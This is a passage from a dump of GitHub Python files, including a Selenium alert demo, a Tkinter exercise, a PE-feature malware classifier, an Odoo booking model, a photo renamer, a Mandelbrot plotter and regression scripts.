)\n","repo_name":"veeminc/veem-python-sdk","sub_path":"src/veem/client/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21894584407","text":"from selenium import webdriver\nimport 
time\nclass application():\n\n def webpage(self):\n\n\n driver = webdriver.Chrome(executable_path=\"E:\\\\Rajesh\\\\Jar\\\\chromedriver.exe\")\n driver.get(\"http://demo.automationtesting.in/Alerts.html\")\n driver.maximize_window()\n alertpop = driver.find_element_by_xpath(\"//a [text() ='Alert with Textbox ']\")\n alertpop.click()\n\n clickbutton = driver.find_element_by_xpath(\"//button[text() ='click the button to demonstrate the prompt box ']\")\n clickbutton.click()\n\n alert_one = driver.switch_to.alert\n alert_one.send_keys(\"Hi\")\n alert_one.accept()\n\n time.sleep(30)\n print(\"alert takencare\")\n\npage = application()\npage.webpage()","repo_name":"RajeshKarthikR/Python","sub_path":"Alert.py","file_name":"Alert.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18704314434","text":"\"\"\"\nCreate a graphical application in Python Tkinter that asks the user to enter an integer N and\ndisplays them the value of the sum \"1 + 2 + ... + N\"\n\"\"\"\nfrom tkinter import *\n\n\ndef callback():\n n = eval(entry_input.get())\n result = sum([i for i in range(1, n+1)])\n if n > 2:\n label_result.configure(text='The sum is 1 + 2 + .. + ' + str(n) + ' = ' + str(result))\n else:\n label_result.configure(text='The sum is ' + ' = ' + str(result))\n\n\nroot = Tk()\n\nscreen_font = ('arial', 12)\n\nlabel_1 = Label(text='Enter value of integer N :', font=screen_font)\nlabel_result = Label(font=screen_font)\n\nentry_input = Entry(font=screen_font, width=20)\nbutton_validate = Button(text='Validate', font=screen_font, width=20, command=callback)\n\n# Let's grid out widgets\nlabel_1.grid(row=0, column=0, padx=10, pady=10)\nentry_input.grid(row=0, column=1, padx=10, pady=10)\nlabel_result.grid(row=1, column=1)\nbutton_validate.grid(row=2, column=1, padx=10, pady=10)\n\nmainloop()\n\n","repo_name":"MoMagdy14/advanced-programming-python","sub_path":"GUI_exercises/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"70589735272","text":"import pandas as pd\nimport numpy as np\nimport pefile\nimport os\nimport hashlib\nimport array\nimport math\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.metrics import plot_confusion_matrix\n\nMalwareDataset = pd.read_csv('MalwareFiles.csv', sep='|') # loads the dataset using | seperator\nLegit = MalwareDataset[0:41323].drop(['legitimate'], axis=1) # Divides the dataset in legitimate samples\nMalware = MalwareDataset[41323::].drop(['legitimate'], axis=1) # Divides the dataset in Malware samples\nMalwareDataset.head()\n\nprint('The total number of features are %i \\n' % Legit.shape[1]) # Checks the number of important features in datset\nData = MalwareDataset.drop(['Name', 'md5', 'legitimate'], axis=1).values #takes out the unimportant features\nTarget = MalwareDataset['legitimate'].values # finds values to fit the model\nFeatSelect = sklearn.ensemble.ExtraTreesClassifier().fit(Data, Target) #randomizes data to minimize overfitting\nprint(FeatSelect.feature_importances_) # prints the 
Tree calssifier important features\nModel = SelectFromModel(FeatSelect, prefit=True) # features scalling to discard the unimportant features or PCA\nData_new = Model.transform(Data) # featues scalling using z-score\nFeatures = Data_new.shape[1] # gets the number of important features after PCA\nIndex = np.argsort(FeatSelect.feature_importances_)[::-1][:Features] # Indexes the important features\ni = 1 # loop counter\nfor feat in range(Features): # loop in number of important features\n print(i,MalwareDataset.columns[2+Index[feat]]) # adds two becuase we deleted the first two features\n i = i+1 # loop increment\nfeature1 = MalwareDataset.columns[2+Index[0]]\nfeature2 = MalwareDataset.columns[2+Index[1]]\nplt.figure(figsize=(10,7))\nsns.scatterplot(x = feature1, y = feature2, s = 70, hue ='legitimate', data=MalwareDataset) # hue represents color\nLegit_Train, Legit_Test, Malware_Train, Malware_Test = train_test_split(Data, Target ,test_size=0.2) \n\n # Splits the data for training & testing \nclf = RandomForestClassifier(n_estimators=50) # builds multiple trees model using n_estimators\nclf.fit(Legit_Train, Malware_Train) # trains the model using on training dataset\nscore = clf.score(Legit_Test, Malware_Test) # gets the accuracy using test dataset \nprint(\"The score of Random Forest Algorithm is\", score*100) # multiplying by 100 to get the percentage\nResult = clf.predict(Legit_Test) # tests for geting the confusion matrix\nCM = confusion_matrix(Malware_Test, Result) # confusion matrix \nprint(\"False positive rate : %f %%\" % ((CM[0][1] / float(sum(CM[0])))*100))\nprint('False negative rate : %f %%' % ( (CM[1][0] /float(sum(CM[1]))*100)))\nplot_confusion_matrix(clf, Legit_Test, Malware_Test,cmap=plt.cm.Blues) # plots the confusion matrix \n\ndef get_entropy(data):\n if len(data) == 0:\n return 0.0\n occurences = array.array('L', [0]*256)\n print(occurences)\n for x in data:\n occurences[x if isinstance(x, int) else ord(x)] += 1\n\n entropy = 0\n for x in occurences:\n if x:\n p_x = float(x) / len(data)\n entropy -= p_x*math.log(p_x, 2)\n\n return entropy\n\ndef get_resources(pe):\n \"\"\"Extract resources :\n [entropy, size]\"\"\"\n resources = []\n if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):\n try:\n for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:\n if hasattr(resource_type, 'directory'):\n for resource_id in resource_type.directory.entries:\n if hasattr(resource_id, 'directory'):\n for resource_lang in resource_id.directory.entries:\n data = pe.get_data(resource_lang.data.struct.OffsetToData, resource_lang.data.struct.Size)\n size = resource_lang.data.struct.Size\n entropy = get_entropy(data)\n\n resources.append([entropy, size])\n except Exception as e:\n return resources\n return resources\n\ndef get_version_info(pe):\n \"\"\"Return version infos\"\"\"\n res = {}\n for fileinfo in pe.FileInfo:\n if fileinfo.Key == 'StringFileInfo':\n for st in fileinfo.StringTable:\n for entry in st.entries.items():\n res[entry[0]] = entry[1]\n if fileinfo.Key == 'VarFileInfo':\n for var in fileinfo.Var:\n res[var.entry.items()[0][0]] = var.entry.items()[0][1]\n if hasattr(pe, 'VS_FIXEDFILEINFO'): \n res['flags'] = pe.VS_FIXEDFILEINFO.FileFlags\n res['os'] = pe.VS_FIXEDFILEINFO.FileOS\n res['type'] = pe.VS_FIXEDFILEINFO.FileType\n res['file_version'] = pe.VS_FIXEDFILEINFO.FileVersionLS\n res['product_version'] = pe.VS_FIXEDFILEINFO.ProductVersionLS\n res['signature'] = pe.VS_FIXEDFILEINFO.Signature\n res['struct_version'] = pe.VS_FIXEDFILEINFO.StrucVersion\n return res\n\ndef 
extract_infos(fpath):\n    res = []\n    pe = pefile.PE(fpath)\n    res.append(pe.FILE_HEADER.Machine) # Machine\n    res.append(pe.FILE_HEADER.SizeOfOptionalHeader) # SizeOfOptionalHeader\n    res.append(pe.FILE_HEADER.Characteristics) # Characteristics\n    res.append(pe.OPTIONAL_HEADER.MajorLinkerVersion) # MajorLinkerVersion\n    res.append(pe.OPTIONAL_HEADER.MinorLinkerVersion) # MinorLinkerVersion\n    res.append(pe.OPTIONAL_HEADER.SizeOfCode) # SizeOfCode\n    res.append(pe.OPTIONAL_HEADER.SizeOfInitializedData) # SizeOfInitializedData\n    res.append(pe.OPTIONAL_HEADER.SizeOfUninitializedData) # SizeOfUninitializedData\n    res.append(pe.OPTIONAL_HEADER.AddressOfEntryPoint) # AddressOfEntryPoint\n    res.append(pe.OPTIONAL_HEADER.BaseOfCode) # BaseOfCode\n    try:\n        res.append(pe.OPTIONAL_HEADER.BaseOfData) # BaseOfData\n    except AttributeError:\n        res.append(0) \n    res.append(pe.OPTIONAL_HEADER.ImageBase) # ImageBase\n    res.append(pe.OPTIONAL_HEADER.SectionAlignment) # SectionAlignment\n    res.append(pe.OPTIONAL_HEADER.FileAlignment) # FileAlignment\n    res.append(pe.OPTIONAL_HEADER.MajorOperatingSystemVersion) # MajorOperatingSystemVersion\n    res.append(pe.OPTIONAL_HEADER.MinorOperatingSystemVersion) # MinorOperatingSystemVersion\n    res.append(pe.OPTIONAL_HEADER.MajorImageVersion) # MajorImageVersion\n    res.append(pe.OPTIONAL_HEADER.MinorImageVersion) # MinorImageVersion\n    res.append(pe.OPTIONAL_HEADER.MajorSubsystemVersion) # MajorSubsystemVersion\n    res.append(pe.OPTIONAL_HEADER.MinorSubsystemVersion) # MinorSubsystemVersion\n    res.append(pe.OPTIONAL_HEADER.SizeOfImage) # SizeOfImage\n    res.append(pe.OPTIONAL_HEADER.SizeOfHeaders) # SizeOfHeaders\n    res.append(pe.OPTIONAL_HEADER.CheckSum) # CheckSum\n    res.append(pe.OPTIONAL_HEADER.Subsystem) # Subsystem\n    res.append(pe.OPTIONAL_HEADER.DllCharacteristics) # DllCharacteristics\n    res.append(pe.OPTIONAL_HEADER.SizeOfStackReserve) # SizeOfStackReserve\n    res.append(pe.OPTIONAL_HEADER.SizeOfStackCommit) # SizeOfStackCommit\n    res.append(pe.OPTIONAL_HEADER.SizeOfHeapReserve) # SizeOfHeapReserve\n    res.append(pe.OPTIONAL_HEADER.SizeOfHeapCommit) # SizeOfHeapCommit\n    res.append(pe.OPTIONAL_HEADER.LoaderFlags) # LoaderFlags\n    res.append(pe.OPTIONAL_HEADER.NumberOfRvaAndSizes) # NumberOfRvaAndSizes\n    res.append(len(pe.sections)) # SectionsNb\n    entropy = list(map(lambda x:x.get_entropy(), pe.sections))\n    res.append(sum(entropy)/float(len(entropy))) # SectionsMeanEntropy\n    res.append(min(entropy)) # SectionsMinEntropy\n    res.append(max(entropy)) # SectionsMaxEntropy\n    raw_sizes = list(map(lambda x:x.SizeOfRawData, pe.sections))\n    res.append(sum(raw_sizes)/float(len(raw_sizes))) # SectionsMeanRawsize\n    res.append(min(raw_sizes)) # SectionsMinRawsize\n    res.append(max(raw_sizes)) # SectionMaxRawsize\n    virtual_sizes = list(map(lambda x:x.Misc_VirtualSize, pe.sections))\n    res.append(sum(virtual_sizes)/float(len(virtual_sizes))) # SectionsMeanVirtualsize\n    res.append(min(virtual_sizes)) # SectionsMinVirtualsize\n    res.append(max(virtual_sizes)) # SectionMaxVirtualsize\n\n    #Imports\n    try:\n        res.append(len(pe.DIRECTORY_ENTRY_IMPORT)) # ImportsNbDLL\n        imports = list(sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])) \n        res.append(len(imports)) # ImportsNb \n        res.append(len([x for x in imports if x.name is None])) # ImportsNbOrdinal\n    except AttributeError:\n        res.append(0)\n        res.append(0)\n        res.append(0)\n\n    #Exports\n    try:\n        res.append(len(pe.DIRECTORY_ENTRY_EXPORT.symbols)) # ExportNb\n    except AttributeError:\n        # No export\n        res.append(0)\n    \n    resources = get_resources(pe) # Resources\n    
res.append(len(resources)) # ResourcesNb\n    if len(resources) > 0:\n        entropy = list(map(lambda x:x[0], resources))\n        res.append(sum(entropy)/float(len(entropy))) # ResourcesMeanEntropy\n        res.append(min(entropy)) # ResourcesMinEntropy\n        res.append(max(entropy)) # ResourcesMaxEntropy\n        sizes = list(map(lambda x:x[1], resources))\n        res.append(sum(sizes)/float(len(sizes))) # ResourcesMeanSize\n        res.append(min(sizes)) # ResourcesMinSize\n        res.append(max(sizes)) # ResourcesMaxSize\n    else:\n        res.append(0)\n        res.append(0)\n        res.append(0)\n        res.append(0)\n        res.append(0)\n        res.append(0)\n    # Load configuration size\n    try:\n        res.append(pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size) # LoadConfigurationSize\n    except AttributeError:\n        res.append(0)\n    # Version configuration size\n    try:\n        version_infos = get_version_info(pe)\n        res.append(len(version_infos.keys())) # VersionInformationSize\n    except AttributeError:\n        res.append(0)\n    return res\nfpath = \"wildfire-test-pe-file.exe\" # file path to predict if file is malware\nfile_extract = extract_infos(fpath) # takes in the file features and saves the list variable\narr = np.array(file_extract) # converts the list to numpy array\narr = arr.reshape(1, 54) # changes the 1D array to 2D array for prediction\nprint(arr) # prints the array\nResult = clf.predict(arr) # Predicts by entering the argument as a numpy array\nif Result == 0:\n    print(\"The file sample is malware\") # prints if file is malware\nelse:\n    print(\"The file sample is not malware\") # prints if file is not malware","repo_name":"bbailey17/Malware-Detection-Using-Python","sub_path":"malwaredetection.py","file_name":"malwaredetection.py","file_ext":"py","file_size_in_byte":13524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35021518184","text":"\nfrom dateutil.relativedelta import relativedelta\n\nfrom odoo import fields, models, api\n\n\nclass Booking(models.Model):\n    _name = \"travels.management.booking\"\n    _description = \"travels management booking\"\n\n    def _compute_expiration_date(self):\n        print(self)\n        for rec in self:\n            rec.expiration_date = rec.booking_date + relativedelta(\n                days=int(rec.services_id.expiration_period))\n            if rec.expiration_date < fields.Date.today():\n                rec.write({'state': 'expired'})\n\n    def button_confirmed(self):\n        # print(self.customer_id.name)\n        self.write({'state': 'confirmed'})\n\n    def button_reset(self):\n        self.write({'state': 'draft'})\n\n    def button_cancel(self):\n        self.write({'state': 'cancelled'})\n\n    name = fields.Char(string=\"Booking Reference\", readonly=True, required=True,\n                       copy=False, default='New')\n    customer_id = fields.Many2one(\"res.partner\", string=\"Customer\", copy=False)\n\n    no_of_passengers = fields.Integer(string=\"No of Passengers\", default='1')\n\n    # service = fields.Selection(\n    #     string='Service',\n    #     selection=[('flight', 'Flight'), ('train', 'Train'), ('bus', 'Bus')],\n    #     help=\"service is used to separate Flight,Train and Bus\")\n    services_id = fields.Many2one(\"travels.management.service.types\",\n                                  required=True)\n    booking_date = fields.Date(default=fields.Date.context_today)\n    source_location_id = fields.Many2one(\"travels.management.location\")\n    destination_location_id = fields.Many2one(\"travels.management.location\")\n\n    travel_date = fields.Datetime()\n    expiration_date = fields.Date(compute=_compute_expiration_date)\n    # current_date = fields.Date(default=fields.Date.context_today)\n\n    state = fields.Selection([\n        ('draft', 'Draft'),\n        ('confirmed', 'Confirmed'),\n        
('cancelled', 'Cancelled'),\n ('expired', 'Expired'),\n ], default=\"draft\")\n\n @api.model\n def create(self, vals):\n if vals.get('name', 'New') == 'New':\n vals['name'] = self.env['ir.sequence'].next_by_code(\n 'booking') or 'New'\n result = super(Booking, self).create(vals)\n return result\n","repo_name":"Aswani2022/MyProject","sub_path":"travels_management/models/travels_management_booking.py","file_name":"travels_management_booking.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11850266888","text":"# Dylan Thiemann\n# Daily programming\n# https://www.reddit.com/r/dailyprogrammer/comments/8i5zc3/20180509_challenge_360_intermediate_find_the/?utm_content=title&utm_medium=hot&utm_source=reddit&utm_name=dailyprogrammer\n\n# Callsign index = 1\n# Longitude index = 5\n# latitude index = 6\n\nimport requests, json, math, sys\n\ndef main(longitude, latitude):\n openSkyApiUrl = \"https://opensky-network.org/api/states/all\"\n response = requests.get(openSkyApiUrl)\n flight_data = response.json()\n\n shortestDistance = sys.float_info.max\n closestFlight = \"\"\n\n startPoint = (latitude, longitude)\n for flight in flight_data[\"states\"]:\n if (flight[5] == None or flight[6] == None):\n continue\n \n distance = euclideanDistance(startPoint, (flight[6], flight[5]))\n if (distance < shortestDistance):\n shortestDistance = distance\n closestFlight = flight\n\n print(closestFlight, shortestDistance)\n\n# startPoint = (lat, long), endPoint = (lat, long)\ndef euclideanDistance(startPoint, endPoint):\n return math.sqrt((endPoint[0] - startPoint[0])**2 + (endPoint[1] - startPoint[1])**2)\n\nmain(-2.2945, 48.8584)","repo_name":"dthiemann/DailyProgrammer","sub_path":"fromReddit/5-9-18.py","file_name":"5-9-18.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16488663565","text":"#!/bin/sh\n\nimport numpy as np\nfrom timeit import default_timer as timer\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\"\"\" Funksjonen tar inn verdiene xmin, xmax, ymin, ymax som setter verdien\n til omraadet vi oensker aa undersoeke. Det sendes ogsaa med en bredde-\n hoyde variabel som bestemmer bildets form/opploesning. Funksjonen danner\n et array c med komplekse tall for alle verdier width * height og en maske\n for aa sjekke hvilke punkter som har konvergert. Saa gaar den opp til\n maxiter og bruker numpy-array operasjoner for aa oppdatere n3 basert paa om\n punktene har konvergert eller ikke. Masken gjoer at kun punkter som ikke\n har konvergert faar utfoert z^2 + c -operasjonen.\n\n Returnerer -> To-dimensjonellt array n3 som inneholder escape values\n for alle piksler\n\"\"\"\ndef mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter):\n\n r1 = np.linspace(xmin, xmax, width)\n r2 = np.linspace(ymin, ymax, height)\n n3 = np.zeros((height, width))\n\n r2_vert = r2.reshape(height,1)\n\n #Arrayet r1 staar for de reelle delene av de komplekse tallene, og\n #r2 staar for de imaginere delene. Vi oensker fra disse aa konstruere\n #ett to-dimensjonellt array med komplekse tall som har sin venstreside\n #(reell del) av delene i r1 mot r2 (imaginer del). 
Vi har et reshapet\n #vertikalt r2 og kan derfor med foelgende linje konstruere et nytt array\n #\"c\" i 2D som vil inneholde alle de komplekse tallene vi skal bruke.\n c = r1 + 1j * r2_vert\n\n #Boolean mask for aa unnga overflow ved sjekk paa plasser som\n #Allerede har konvergert\n mask = np.ones((height, width), dtype=np.bool_)\n\n #Vi danner et 2D array med komplekse tall. I foerste iterasjon er dette\n #arrayet kun bestaende av null og blir derfor satt til aa inneholde det\n #Samme som c inne i loekken. Deretter vil det inneholde produktet av\n #seg selv gange seg selv pluss c respektivt til alle plasser, z*z + c\n z = np.zeros((height, width), dtype=np.complex64)\n for n in range(maxiter):\n\n #Paa n3 = n3 + (abs(z) < 2.0) er det som skjer at alle posisjoner der\n #absoluttverdien av z er stoerre enn 2 itereres med en, og de som er\n #i mandelbrot gaar derfor opp mot maxiter stoerrelse. Vi bruker mask\n #for aa unngaa overflow error. Mask oppdateres etter hver iterasjon\n #for aa sjekke hva som har konvergert\n z[mask] = z[mask]*z[mask] + c[mask]\n n3 = n3 + (abs(z) < 2.0)\n mask = (abs(z) < 2.0)\n\n return (n3)\n\ndef mandelbrot_image(xmin,xmax,ymin,ymax,width,height,maxiter,fname,color_choice):\n\n print()\n print(\"-- Timing 3 runs ---\")\n\n start1 = timer()\n z1 = mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter)\n stop1 = timer()\n\n start2 = timer()\n z2 = mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter)\n stop2 = timer()\n\n start3 = timer()\n z3 = mandelbrot_set(xmin,xmax,ymin,ymax,width,height,maxiter)\n stop3 = timer()\n\n print()\n print(\"Results:\")\n print(stop1 - start1)\n print(stop2 - start2)\n print(stop3 - start3)\n print()\n\n #Med denne sammenstillingen i \"colors\" saa vil alltid de fargene (CHOICE = 1) som har\n #\"maxiter\" verdi tilegnes fargen svart gitt av (0, 0, 0), og de andre\n #fargene vil farges etter hvilken maxiter verdi de fikk naar de konvergerte,\n #dvs deres verdi fra 1 til maxiter. 
Dette fungerer fordi vaart 2D array\n #som returneres inneholder alle maxiter verdiene for konvergering.\n if(fname != None):\n if(color_choice == \"1\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.savefig(fname)\n plt.show()\n if(color_choice == \"2\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 1, 1), (1, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.savefig(fname)\n plt.show()\n if(color_choice == \"3\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.savefig(fname)\n plt.show()\n else:\n if(color_choice == \"1\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.show()\n if(color_choice == \"2\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(1, 1, 1), (1, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.show()\n if(color_choice == \"3\"):\n cmap_name = \"Liste mandelbrot\"\n n_bins = np.arange(maxiter)\n colors = [(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 1, 0)]\n cma = LinearSegmentedColormap.from_list(cmap_name, colors, maxiter)\n\n plt.imshow(z1, cmap=cma)\n plt.show()\n\n\nmandelbrot_image(-2.0,0.5,-1.25,1.25,500,500,50)\n","repo_name":"PeterKon/Skoleprosjekter","sub_path":"MandelbrotGenerator/mandelbrot_2.py","file_name":"mandelbrot_2.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41203934339","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import MinMaxScaler\nfrom models.LinearRegression import LinearRegression\nfrom models.KnnRegression import KnnRegression\nfrom models.DecisionTreeRegression import DecisionTreeRegression\nfrom models.RandomForestRegression import RandomForestRegression\n\nnp.random.seed(428)\ndata = []\n\ndef load_data():\n\tglobal data\n\t#menu id dictionary data (structure: {menu_id[idx]: [1,2,3]})\n\tmenu_id = dict()\n\tmenu_buff = pd.read_excel('./data/menu.xlsx')\n\tdf = pd.DataFrame(menu_buff)\n\n\tfor idx, row in df.iterrows():\n\t\tmenu_id[int(row['FoodId'])] = [row['재료'],row['조리'],row['메뉴']]\n\n\t#food supply/left data in np.array\n\tdata = pd.read_csv('./data/final_data.csv',na_values = {'food_supply':[],'food_left':[]},sep=',')\n\tdf = pd.DataFrame(data)\n\n\t#drop out null data\n\txy = np.array(df.dropna(), dtype=np.int32)\n\tx = xy[:,1:4]\n\ty = xy[:,4]\n\n\t#transform [date, foodId] -> categorical data\n\ttemp=[]\n\tfor i in range(len(x)):\n\t\ttemp.append([x[i][0]]+menu_id[x[i][1]])\n\ttemp = np.array(temp)\n\n\tnumeric = np.hstack((x[:,2].reshape(-1,1),xy[:,-2:]))\n\n\t# scaling (0,1)\n\tscaler = MinMaxScaler()\n\tnumeric = scaler.fit_transform(numeric)\n\n\t#One-Hot encoding categorical data\n\tone_hot_e = OneHotEncoder().fit_transform(temp).toarray()\n\tx = np.hstack((one_hot_e, 
numeric))\n\t#x = np.hstack((one_hot_e, x[:,2].reshape(-1,1)))\n\tdata = np.hstack((x, y.reshape(-1, 1)))\n\n# split train set / test set\ndef split_data(test_ratio):\n\tif len(data)==0: load_data()\n\n\tnp.random.shuffle(data)\n\ttest_size = int(len(data)*test_ratio)\n\ttest_x = data[:test_size, :-1]\n\ttest_y = data[:test_size, -1]\n\ttrain_x = data[test_size:, :-1]\n\ttrain_y = data[test_size:, -1]\n\n\treturn test_x, test_y, train_x, train_y\n\ndef initialize(test_ratio, model_name):\n\ttest_x, test_y, train_x, train_y = split_data(test_ratio)\n\tmodel = None\n\n\tif model_name == 'LinearRegression':\n\t\tmodel = LinearRegression()\n\telif model_name == 'KnnRegression':\n\t\ttest_x = np.hstack((test_x[:, :-3], test_x[:, -3:]))\n\t\ttrain_x = np.hstack((train_x[:, :-3], train_x[:, -3:]))\n\t\tmodel = KnnRegression()\n\telif model_name == 'DecisionTreeRegression':\n\t\tmodel = DecisionTreeRegression()\n\telif model_name == 'RandomForestRegression':\n\t\tmodel = RandomForestRegression()\n\telse:\n\t\traise NotImplementedError\n\n\treturn (test_x, test_y), (train_x, train_y), model","repo_name":"yds9744/ML-predict-leftover","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23181682244","text":"\"\"\"\nThis file renumbers photos in a folder to integer numbers starting at 0001.\n\"\"\"\n\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\n\ndef first_num(filename: Path):\n \"\"\"\n Get a number to sort filenames based on.\n If there are spaces, it is clearly not a numeric file name.\n If the first character in the name is not a digit, then it is not a number.\n If the first character is a number then sort based on that.\n \"\"\"\n\n filename = filename.name\n\n filename = filename.split(\" \")\n\n if len(filename) == 1:\n return 0\n\n if not filename[0].isdigit():\n return 0\n\n return int(filename[0])\n\n\ndef rename_photos():\n \"\"\"\n This file renumbers photos in a folder to integer numbers starting at 0001.\n \"\"\"\n\n true_dict = {\"n\": False, \"no\": False, \"y\": True, \"yes\": True}\n\n print()\n print(\"This will rename the files, and cannot be reversed.\")\n\n while True:\n keep_going = input(\"Do you wish to continue (y or n)? \")\n\n keep_going = keep_going.lower()\n\n if keep_going in true_dict:\n keep_going = true_dict[keep_going]\n break\n\n if not keep_going:\n return\n\n print()\n base_path = Path(input(\"Provide the base path: \"))\n\n if base_path.is_dir():\n recursive: bool = None\n print()\n while recursive is None:\n recursive = input(\"Do you want to search subfolders (Y or N)? 
\")\n\n recursive = true_dict.get(recursive.lower())\n\n file_types = [\".jpg\", \".png\", \".bmp\", \".jpeg\"]\n\n # now we've got input, now do the actual finding of files\n\n directories = set()\n\n if recursive:\n # if subfolders are required, use rglob\n\n print()\n print(\"Finding Sub-folders by Parsing Links\")\n\n print()\n\n filter_val = \"*\"\n\n d_list = [\n f\n for f in tqdm(\n base_path.rglob(filter_val), desc=\"Parsing links\", unit=\"Links\"\n )\n if f.is_dir()\n ]\n\n for directory in d_list:\n directories.add(directory)\n\n else:\n # if only the local folder, just use iterdir\n\n directories.add(base_path)\n\n print()\n\n changed = 0\n\n warnings = []\n\n for folder in tqdm(\n sorted(directories), desc=\"Searching for Photos\", unit=\"Files\"\n ):\n counter = 1\n\n folder: Path\n\n # now go through the files / photos etc.\n for photo in tqdm(\n sorted(folder.iterdir(), key=first_num),\n desc=\"Renaming Photos\",\n unit=\"Photos\",\n ):\n photo: Path\n\n if photo.is_dir():\n continue\n\n if photo.suffix.lower() in file_types:\n # now we need to rename\n new_path = photo.parent / Path(f\"{counter:04d}\").with_suffix(\n photo.suffix\n )\n\n if new_path.exists():\n warning_string = \"ERROR\\n\"\n warning_string += (\n f\"Tried replacing: \\n {folder}\\n\"\n + f\"with\\n {new_path}\\n\"\n )\n warning_string += \"But new path already exists\\n\"\n warning_string += \"-\" * 40\n warning_string += \"\\n\"\n\n warnings += [warning_string]\n\n continue\n\n photo.rename(new_path)\n changed += 1\n\n counter += 1\n\n print()\n print(f\"Updated {changed} files\")\n\n else:\n print(\"The provided path is not a directory.\")\n\n print()\n input(\"Press any key to exit.\")\n\n\nif __name__ == \"__main__\":\n rename_photos()\n","repo_name":"skane88/utilityscripts","sub_path":"utilityscripts/photo_renamer.py","file_name":"photo_renamer.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42185792405","text":"## Required Libraries\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score\n\n## Import data and get X and Y variables (Independant and Dependant Respectively)\ncompanies = pd.read_csv(r'C:\\Users\\kayde\\source\\repos\\MachineLearningAlgos\\LinearRegression\\1000_Companies.csv')\n\nX = companies.iloc[:, :-1].values\nY = companies.iloc[:, 4].values\n\n## Print all data\nprint(companies.head())\n## Print independant data\nprint(X)\n## Print dependant data\nprint(Y)\n\n## Builds correlation matrix : 1 = more correlation 0 = less\nplt.figure(figsize=(10, 7))\n## Only include columns with numbers bc of error\nnumeric_companies = companies.select_dtypes(include=[np.number])\nsns.heatmap(numeric_companies.corr(), annot=True, cmap=\"coolwarm\")\nplt.show()\n\n## Encode the categorical data\ncolumn_transformer = ColumnTransformer(\n transformers=[\n (\"encoder\", OneHotEncoder(drop='first'), [3]) # We're using drop='first' to avoid the dummy variable trap\n ],\n remainder='passthrough'\n)\n\nX = column_transformer.fit_transform(X)\nX = X[:, 1:] ## Removes dummy data\n\n## Create the train/test split\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n## Initialize the 
